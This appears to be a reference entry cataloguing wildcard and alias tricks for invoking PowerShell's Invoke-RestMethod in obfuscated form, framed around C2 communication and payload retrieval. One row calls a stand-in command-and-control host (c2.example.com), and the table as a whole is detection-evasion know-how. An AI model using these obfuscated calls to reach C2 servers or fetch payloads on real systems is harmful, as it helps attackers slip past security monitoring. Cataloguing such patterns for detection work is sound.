Invoke-RestMethod
Send HTTP/HTTPS requests and receive structured responses. Used for C2 communication, API interactions, and payload retrieval.
Binary Paths
PowerShell cmdlet
Glob Patterns
| Pattern | Wildcards | Notes |
|---|---|---|
& (gcm I*-R*M*) -Uri http://c2.example.com/cmd
|
* | Wildcards in verb and both parts of noun |
& (gcm Invoke-Rest*) -Uri ...
|
* | Star matches 'Method' |
& (gcm I*ke-RestMethod) -Uri ...
|
* | Wildcard in verb only |
& (gcm *RestMethod) -Uri ...
|
* | Prefix wildcard |
irm -Uri ...
|
Built-in alias 'irm' — not a glob but used in combination | |
& (gcm Invok[d-f]-RestMethod) -Uri ...
|
[d-f] | Character range matches 'e' in Invoke |
& (gal ir?) -Uri ...
|
? | Get-Alias with wildcard resolves 'irm' |
& (gcm *-Rest*od) -Uri ...
|
* | Multiple wildcards with partial matching |
& (DIR Alias:/ir?) -Uri http://...
|
? | Resolves irm alias via PowerShell's Alias: PSDrive glob |